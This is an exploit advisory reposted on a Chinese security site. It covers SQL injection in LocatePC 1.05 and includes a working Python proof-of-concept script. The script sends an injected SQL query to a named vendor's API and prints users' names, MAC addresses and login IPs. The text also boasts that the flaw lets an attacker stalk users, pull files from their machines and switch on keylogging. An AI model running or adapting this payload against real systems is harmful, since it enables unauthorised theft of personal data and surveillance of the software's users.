首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LocatePC v1.05 (Ligatt Version + Others) Trivial SQLi
来源:http://www.ligattsecurity.com 作者:vfocus 发布时间:2011-02-11  

#Affected Software:
#LocatePC 1.05

#Consequences:

#Arbitrary SELECT queries against the LocatePC and "mysql" database.
#The LocatePC database contains enough information to stalk all
#users of the software. It may be possible to instruct the software
#to upload arbitrary files from each user's computer to the LocatePC
#database, and then to later extract those files from the database.
#Activating the software's keylogging functionality is both possible
#and hilarious.

#Proof of Concept:

#!/usr/bin/python
import httplib
import urllib
import xml.etree.ElementTree
h = httplib.HTTPSConnection('www.ligattsecurity.com')
p = '''<Request
funcname="uName,mac_address,last_login_ip,program_login from user
where LENGTH(last_login_ip) > 0;--"></Request>'''
h.request("POST","/locatePC/api/",p,{"ContentType":"application/x-
www-form-urlencoded"})
r = h.getresponse()
data = urllib.unquote_plus(r.read())
for i in xml.etree.ElementTree.fromstring(data).iter():
        if i.tag == "Row":
                print ""
        elif i.tag == "Cell" and i.text != None:
                print i.text


#Solution:
#DON'T USE LOCATEPC!!!

#References:
#- http://www.ligattsecurity.com/solutions/locate-pc


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·XM Easy Personal FTP Server 5.
·Drupal CAPTCHA Logic Security
·Linksys WAP610N Unauthenticate
·Microsoft Windows CreateSizeDI
·rdesktop 1.6.0 Memory Corrupti
·Internet Explorer CSS Recursiv
·xRadio 0.95b Local Buffer Over
·webERP 4.0.1 Shell Upload
·Unreal Tournament Buffer Overf
·MoviePlay 4.82 (.lst) Buffer O
·Openedit <= v5.1294 Remote Cod
·CuteZip 2.1 Buffer Overflow Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved